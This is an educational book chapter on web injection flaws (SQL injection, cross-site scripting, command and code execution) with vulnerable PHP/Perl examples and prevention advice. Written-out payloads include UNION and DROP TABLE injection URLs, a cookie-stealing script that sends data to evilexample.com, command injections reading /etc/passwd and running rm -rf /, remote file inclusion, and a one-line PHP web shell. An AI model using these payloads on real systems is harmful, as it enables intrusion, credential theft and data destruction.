10.6. Injection Flaws

Finally, we reach a type of flaw that can cause serious damage. If you thought the flaws we have covered were mostly harmless, you would be right. But those flaws were a preparation (in this book, and in successful compromise attempts) for what follows.

Injection flaws get their name because when they are used, malicious user-supplied data flows through the application, crosses system boundaries, and gets injected into another system component. System boundaries can be tricky because a text string that is harmless for PHP can turn into a dangerous weapon when it reaches a database.

Injection flaws come in as many flavors as there are component types. Three flaws are particularly important because practically every web application can be affected: SQL injection, cross-site scripting (XSS), and command execution.
Other types of injection are also feasible. Papers covering LDAP injection and XPath injection are listed in Section 10.9.

10.6.1. SQL Injection

SQL injection attacks are among the most common because nearly every web application uses a database to store and retrieve data. Injections are possible because applications typically use simple string concatenation to construct SQL queries, but fail to sanitize input data.

10.6.1.1 A working example

SQL injections are fun if you are not at the receiving end. We will use a complete programming example and examine how these attacks take place. We will use PHP and MySQL 4.x. You can download the code from the book web site, so do not type it.

Create a database with two tables and a few rows of data. The database represents an imaginary bank where my wife and I keep our money.

    CREATE DATABASE sql_injection_test;
    USE sql_injection_test;

    CREATE TABLE customers (
        customerid INTEGER NOT NULL,
        username CHAR(32) NOT NULL,
        password CHAR(32) NOT NULL,
        PRIMARY KEY(customerid)
    );

    INSERT INTO customers ( customerid, username, password )
        VALUES ( 1, 'ivanr', 'secret' );
    INSERT INTO customers ( customerid, username, password )
        VALUES ( 2, 'jelena', 'alsosecret' );

    CREATE TABLE accounts (
        accountid INTEGER NOT NULL,
        customerid INTEGER NOT NULL,
        balance DECIMAL(9, 2) NOT NULL,
        PRIMARY KEY(accountid)
    );

    INSERT INTO accounts ( accountid, customerid, balance )
        VALUES ( 1, 1, 1000.00 );
    INSERT INTO accounts ( accountid, customerid, balance )
        VALUES ( 2, 2, 2500.00 );

Create a PHP file named view_customer.php with the following code inside, and set the values of the variables at the top of the file as appropriate to enable the script to establish a connection to your database:

    <?
    $dbhost = "localhost";
    $dbname = "sql_injection_test";
    $dbuser = "root";
    $dbpass = "";

    // connect to the database engine
    if (!mysql_connect($dbhost, $dbuser, $dbpass)) {
        die("Could not connect: " . mysql_error());
    }

    // select the database
    if (!mysql_select_db($dbname)) {
        die("Failed to select database $dbname:" . mysql_error());
    }

    // construct and execute query
    $query = "SELECT username FROM customers WHERE customerid = "
        . $_REQUEST["customerid"];
    $result = mysql_query($query);
    if (!$result) {
        die("Failed to execute query [$query]: " . mysql_error());
    }

    // show the result
    while ($row = mysql_fetch_assoc($result)) {
        echo "USERNAME = " . $row["username"] . "<br>";
    }

    // close the connection
    mysql_close();
    ?>

This script might be written by a programmer who does not know about SQL injection attacks. The script is designed to accept the customer ID as its only parameter (named customerid). Suppose you request a page using the following URL:

    http://www.example.com/view_customer.php?customerid=1

The PHP script will retrieve the username of the customer (in this case, ivanr) and display it on the screen. All seems well, but what we have in the query in the PHP file is the worst-case SQL injection scenario. The customer ID supplied in a parameter becomes a part of the SQL query in a process of string concatenation. No checking is done to verify that the parameter is in the correct format. Using simple URL manipulation, the attacker can inject SQL commands directly into the database query, as in the following example:

    http://www.example.com/view_customer.php?customerid=1%20OR%20customerid%3D2

If you specify the URL above, you will get two usernames displayed on the screen instead of the single one the programmer intended. Notice how we have URL-encoded some characters to put them into the URL, specifying %20 for the space character and %3D for an equals sign. These characters have special meanings when they are a part of a URL, so we had to hide them to make the URL work.
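The percent-encoding step can be checked with a few lines of code. The sketch below uses Python's standard urllib.parse module (Python is used here only to keep the illustration self-contained; the chapter's own code is PHP) to encode the injected value and then decode it again, much as the server does before the script sees the parameter. The variable names are illustrative.

```python
from urllib.parse import quote, unquote

# The value the attacker wants the script to receive in customerid.
payload = "1 OR customerid=2"

# Percent-encode every character that is not a letter, digit, or one of "_.-~".
# safe="" ensures that no reserved character is left unencoded.
encoded = quote(payload, safe="")
print(encoded)   # 1%20OR%20customerid%3D2

# Decoding reverses the transformation and recovers the original value.
decoded = unquote(encoded)
print(decoded)   # 1 OR customerid=2
```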
After the URL is decoded and the specified customerid sent to the PHP program, this is what the query looks like (the user-supplied data is 1 OR customerid=2):

    SELECT username FROM customers WHERE customerid = 1 OR customerid=2

This type of SQL injection is the worst-case scenario because the input data is expected to be an integer, and in that case many programmers neglect to validate the incoming value. Integers can go into an SQL query directly because they cannot cause a query to fail. This is because integers consist only of digits, and digits do not have a special meaning in SQL. The trouble is that nothing guarantees the supplied value actually is an integer.

Strings, unlike integers, can contain special characters (such as single quotation marks) so they have to be converted into a representation that will not confuse the database engine. This process is called escaping and is usually performed by preceding each special character with a backslash character. Imagine a query that retrieves the customer ID based on the username. The code might look like this:

    $query = "SELECT customerid FROM customers WHERE username = '"
        . $_REQUEST["username"] . "'";

You can see that the data we supply goes into the query, surrounded by single quotation marks. That is, if your request looks like this:

    http://www.example.com/view_customer.php?username=ivanr

The query becomes:

    SELECT customerid FROM customers WHERE username = 'ivanr'

Appending malicious data to the page parameter as we did before will do little damage because whatever is surrounded by quotes will be treated by the database as a string and not a query. To change the query an attacker must terminate the string using a single quote, and only then continue with the query. Assuming the previous query construction, the following URL would perform an SQL injection:

    http://www.example.com/view_customer.php?username=ivanr'%20OR%20username%3D'jelena'--%20

By adding a single quote to the username parameter, we terminated the string and entered the query space.
However, to make the query work, we added an SQL comment start (--) at the end, neutralizing the single quote appended at the end of the query in the code. The query becomes:

    SELECT customerid FROM customers WHERE username = 'ivanr' OR username='jelena'-- '

The query returns two customer IDs, rather than the one intended by the programmer. This type of attack is actually often more difficult to do than the attack in which single quotes were not used because some environments (PHP, for example) can be configured to automatically escape single quotes that appear in the input URL. That is, they may change a single quote (') that appears in the input to \', in which the backslash indicates that the single quote following it should be interpreted as the single quote character, not as a quote delimiting a string. Even programmers who are not very security-conscious will often escape single quotes because not doing so can lead to errors when an attempt is made to enter a name such as O'Connor into the application.

Though the examples so far included only the SELECT construct, INSERT and DELETE statements are equally vulnerable. The only way to avoid SQL injection problems is to avoid using simple string concatenation as a way to construct queries. A better (and safe) approach is to use prepared statements. In this approach, a query template is given to the database, followed by the separate user data. The database will then construct the final query, ensuring no injection can take place.

10.6.1.2 Union

We have seen how SQL injection can be used to access data from a single table. If the database system supports the UNION construct (which MySQL does as of Version 4), the same concept can be used to fetch data from multiple tables. With UNION, you can append a new query to fetch data and add it to the result set.
Suppose the parameter customerid from the previous example is set as follows:

    http://www.example.com/view_customer.php?customerid=1%20UNION%20ALL%20SELECT%20balance%20FROM%20accounts%20WHERE%20customerid%3D2

The query becomes:

    SELECT username FROM customers WHERE customerid = 1 UNION ALL SELECT balance FROM accounts WHERE customerid=2

The original query fetches a username from the customers table. With UNION appended, the modified query fetches the username but it also retrieves an account balance from the accounts table.

10.6.1.3 Multiple statements in a query

Things become really ugly if the database system supports multiple statements in a single query. Though our attacks so far were a success, there were still two limitations:
With multiple statements possible, we are free to submit a custom-crafted query to perform any action on the database (limited only by the permissions of the user connecting to the database). When allowed, statements are separated by a semicolon. Going back to our first example, here is the URL to remove all customer information from the database:

    http://www.example.com/view_customer.php?customerid=1;DROP%20TABLE%20customers

After SQL injection takes place, the second SQL query to be executed will be DROP TABLE customers.

10.6.1.4 Special database features

Exploiting SQL injection flaws can be hard work because there are many database engines, and each engine supports different features and a slightly different syntax for SQL queries. The attacker usually works to identify the type of database and then proceeds to research its functionality in an attempt to use some of it. Databases have special features that make life difficult for those who need to protect them:
10.6.1.5 SQL injection attack resources

We have only exposed the tip of the iceberg with our description of SQL injection flaws. Because they are the most popular type of flaw, they have been heavily researched. You will find the following papers useful to learn more about such flaws.
10.6.2. Cross-Site Scripting

Unlike other injection flaws, which occur when the programmer fails to sanitize data on input, cross-site scripting (XSS) attacks occur on the output. If the attack is successful, the attacker will control the HTML source code, emitting HTML markup and JavaScript code at will.

This attack occurs when data sent to a script in a parameter appears in the response. One way to exploit this vulnerability is to make a user click on what he thinks is an innocent link. The link then takes the user to a vulnerable page, but the parameters will spice the page content with malicious payload. As a result, malicious code will be executed in the security context of the browser.

Suppose a script contains an insecure PHP code fragment such as the following:

    <? echo $_REQUEST["param"] ?>

It can be attacked with a URL similar to this one:

    http://www.example.com/xss.php?param=<script>alert(document.location)</script>

The final page will contain the JavaScript code given to the script as a parameter. Opening such a page will result in a JavaScript pop-up box appearing on the screen (in this case displaying the contents of the document.location variable) though that is not what the original page author intended. This is a proof of concept you can use to test if a script is vulnerable to cross-site scripting attacks.

Email clients that support HTML and sites where users encounter content written by other users (often open communities such as message boards or web mail systems) are the most likely places for XSS attacks to occur. However, any web-based application is a potential target. My favorite example is the registration process most web sites require. If the registration form is vulnerable, the attack data will probably be permanently stored somewhere, most likely in the database.
Whenever a request is made to see the attacker's registration details (newly created user accounts may need to be approved manually for example), the attack data presented in a page will perform an attack. In effect, one carefully placed request can result in attacks being performed against many users over time. XSS attacks can have some of the following consequences:
In our first XSS example, we displayed the contents of the document.location variable in a dialog box. The value of the cookie is stored in document.cookie. To steal a cookie, you must be able to send the value somewhere else. An attacker can do that with the following code:

    <script>document.write('<img src=http://www.evilexample.com/' + document.cookie + '>')</script>

If embedding of the JavaScript code proves to be too difficult because single quotes and double quotes are escaped, the attacker can always invoke the script remotely:

    <script src=http://www.evilexample.com/script.js></script>
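Payloads like these only work if the markup reaches the browser unmodified. As a minimal sketch of output escaping, the following Python fragment (an illustration only; the function name render_param and the page text are hypothetical, and the chapter's own code is PHP) uses the standard html.escape function to turn HTML metacharacters into entities before a request value is written into a page.

```python
import html

def render_param(value: str) -> str:
    """Return an HTML fragment that displays value as plain text."""
    # html.escape converts &, < and > into entities; with quote=True it
    # also converts " and ', so the browser displays the characters
    # instead of interpreting them as markup.
    return "<p>You entered: " + html.escape(value, quote=True) + "</p>"

payload = "<script>alert(document.location)</script>"
print(render_param(payload))
# <p>You entered: &lt;script&gt;alert(document.location)&lt;/script&gt;</p>
```

This kind of escaping is appropriate for text placed in the body of an HTML page. Values written into other contexts, such as URLs or JavaScript code, need encoding suited to that context.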
XSS attacks can be difficult to detect because most action takes place at the browser, and there are no traces at the server. Usually, only the initial attack can be found in server logs. If one can perform an XSS attack using a POST request, then nothing will be recorded in most cases, since few deployments record POST request bodies.

One way of mitigating XSS attacks is to turn off browser scripting capabilities. However, this may prove to be difficult for typical web applications because most rely heavily on client-side JavaScript. Internet Explorer supports a proprietary extension to the Cookie standard, called HttpOnly, which allows developers to mark cookies used for session management only. Such cookies cannot be accessed from JavaScript later. This enhancement, though not a complete solution, is an example of a small change that can result in large benefits. Unfortunately, at the time of writing, only Internet Explorer supports this feature.

XSS attacks can be prevented by designing applications to properly validate input data and escape all output. Users should never be allowed to submit HTML markup to the application. But if you have to allow it, do not rely on simple text replacement operations and regular expressions to sanitize input. Instead, use a proper HTML parser to deconstruct input data, and then extract from it only the parts you know are safe.

10.6.2.1 XSS attack resources
10.6.3. Command Execution

Command execution attacks take place when the attacker succeeds in manipulating script parameters to execute arbitrary system commands. These problems occur when scripts execute external commands using input parameters to construct the command lines but fail to sanitize the input data.

Command executions are frequently found in Perl and PHP programs. These programming environments encourage programmers to reuse operating system binaries. For example, executing an operating system command in Perl (and PHP) is as easy as surrounding the command with backtick operators. Look at this sample PHP code:

    $output = `ls -al /home/$username`;
    echo $output;

This code is meant to display a list of files in a folder. If a semicolon is used in the input, it will mark the end of the first command, and the beginning of the second. The second command can be anything you want. The following invocation will display the contents of the passwd file on the server:

    http://www.example.com/view_user.php?username=ivanr;cat%20/etc/passwd

Once the attacker compromises the server this way, he will have many opportunities to take advantage of it:
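The semicolon trick shown in this section works because the whole command line is handed to a shell, which interprets metacharacters found in the data. The following is a minimal sketch of one way to avoid that, written in Python for illustration. The function names and the username pattern are assumptions made for this sketch and are not part of the original script. The idea is to validate the name against a strict pattern and to pass the command as an argument list so that no shell is involved.

```python
import re
import subprocess

# Assumed policy for this sketch: usernames are short and alphanumeric.
USERNAME_RE = re.compile(r"[A-Za-z0-9_]{1,32}")

def build_listing_command(username: str) -> list:
    """Build the argument list for listing a user's home directory."""
    if not USERNAME_RE.fullmatch(username):
        raise ValueError("invalid username")
    # Each list element reaches the program as exactly one argument.
    return ["ls", "-al", "/home/" + username]

def list_home(username: str) -> str:
    # shell=True is not used, so the arguments are never parsed by a
    # shell and characters such as ; | or ` have no special meaning.
    result = subprocess.run(build_listing_command(username),
                            capture_output=True, text=True, check=False)
    return result.stdout

# The attack string from the text is rejected before any command runs.
try:
    build_listing_command("ivanr;cat /etc/passwd")
except ValueError as err:
    print("rejected:", err)   # rejected: invalid username
```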
The most commonly used attack vector for command execution is mail sending in form-to-email scripts. These scripts are typically written in Perl. They are written to accept data from a POST request, construct the email message, and use sendmail to send it. A vulnerable code segment in Perl could look like this:

    # send email to the user
    open(MAIL, "|/usr/lib/sendmail $email");
    print MAIL "Thank you for contacting us.\n";
    close MAIL;

This code never checks whether the parameter $email contains only the email address. Since the value of the parameter is used directly on the command line, an attacker could terminate the email address using a semicolon, and execute any other command on the system:

    http://www.example.com/feedback.php?email=ivanr@webkreator.com;rm%20-rf%20/

10.6.4. Code Execution

Code execution is a variation of command execution. It refers to execution of the code (script) that runs in the web server rather than direct execution of operating system commands. The end result is the same because attackers will only use code execution to gain command execution, but the attack vector is different. If the attacker can upload a code fragment to the server (using FTP or file upload features of the application) and the vulnerable application contains an include() statement that can be manipulated, the statement can be used to execute the uploaded code. A vulnerable include() statement is usually similar to this:

    include($_REQUEST["module"] . "/index.php");

Here is an example URL with which it can be used:

    http://www.example.com/index.php?module=news

In this particular example, for the attack to work the attacker must be able to create a file called index.php anywhere on the server and then place the full path to it in the module parameter of the vulnerable script.

As discussed in Chapter 3, the allow_url_fopen feature of PHP is extremely dangerous and enabled by default. When it is used, any file operation in PHP will accept and use a URL as a filename.
When used in combination with include(), PHP will download and execute a script from a remote server (!):

    http://www.example.com/index.php?module=http://www.evilexample.com

Another feature, register_globals, can contribute to exploitation. Fortunately, this feature is disabled by default in recent PHP versions. I strongly advise you to keep it disabled. Even when the script is not using input data in the include() statement, it may use the value of some other variable to construct the path:

    include($TEMPLATES . "/template.php");

With register_globals enabled, the attacker can possibly override the value of the $TEMPLATES variable, with the end result being the same:

    http://www.example.com/index.php?TEMPLATES=http://www.evilexample.com

It's even worse if the PHP code only uses a request parameter to locate the file, as in the following example:

    include($parameter);

When the register_globals option is enabled in a request that is of multipart/form-data type (the type of the request is determined by the attacker so he can choose to have the one that suits him best), PHP will store the uploaded file somewhere on disk and put the full path to the temporary file into the variable $parameter. The attacker can upload the malicious script and execute it in one go. PHP will even delete the temporary file at the end of request processing and help the attacker hide his tracks!

Sometimes other problems can lead to code execution on the server if someone manages to upload a PHP script through the FTP server and get it to execute in the web server. (See the www.apache.org compromise mentioned near the end of the "SQL Injection" section for an example.)

A frequent error is to allow content management applications to upload files (images) under the web server tree but forget to disable script execution in the folder. If someone hijacks the content management application and uploads a script instead of an image, he will be able to execute anything on the server.
He will often only upload a one-line script similar to this one:

    <? passthru($cmd) ?>

Try it out for yourself and see how easy it can be.

10.6.5. Preventing Injection Attacks

Injection attacks can be prevented if proper thought is given to the problem in the software design phase. These attacks can occur wherever characters with a special meaning, metacharacters, are mixed with data. There are many types of metacharacters. Each system component can use different metacharacters for different purposes. In HTML, for example, special characters are &, <, >, ", and '. Problems only arise if the programmer does not take steps to handle metacharacters properly. To prevent injection attacks, a programmer needs to perform four steps:
Data validation and transformation should be automated wherever possible. For example, if transformation is performed in each script then each script is a potential weak point. But if scripts use an intermediate library to retrieve user input and the library contains functionality to handle data validation and transformation, then you only need to make sure the library works as expected. This principle can be extended to cover all data manipulation: never handle data directly, always use a library.

The metacharacter problem can be avoided if control information is transported independently from data. In such cases, special characters that occur in data lose all their powers, transformation is unnecessary and injection attacks cannot succeed. The use of prepared statements to interact with a database is one example of control information and data separation.
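As a minimal sketch of this separation, the following example rebuilds the customers table from the SQL injection section in an in-memory SQLite database (an assumption made to keep the example self-contained; the chapter itself uses MySQL) and compares string concatenation with a parameterized query. It is written in Python, and the function names are illustrative.

```python
import sqlite3

def make_db() -> sqlite3.Connection:
    """Create an in-memory database holding the two sample customers."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE customers ("
                 "customerid INTEGER NOT NULL PRIMARY KEY, "
                 "username CHAR(32) NOT NULL, "
                 "password CHAR(32) NOT NULL)")
    conn.executemany("INSERT INTO customers VALUES (?, ?, ?)",
                     [(1, "ivanr", "secret"), (2, "jelena", "alsosecret")])
    return conn

def usernames_concatenated(conn, customerid: str) -> list:
    # Vulnerable: the input becomes part of the SQL text itself.
    query = "SELECT username FROM customers WHERE customerid = " + customerid
    return [row[0] for row in conn.execute(query)]

def usernames_parameterized(conn, customerid: str) -> list:
    # The query template and the data are handed over separately, so
    # the data is only ever treated as a single value.
    query = "SELECT username FROM customers WHERE customerid = ?"
    return [row[0] for row in conn.execute(query, (customerid,))]

conn = make_db()
attack = "1 OR customerid=2"
print(usernames_concatenated(conn, attack))   # both usernames are returned
print(usernames_parameterized(conn, attack))  # [] (no customer has that ID)
print(usernames_parameterized(conn, "1"))     # ['ivanr']
```

Validating that customerid really is an integer before using it remains worthwhile. The parameterized query only guarantees that the value cannot change the structure of the statement.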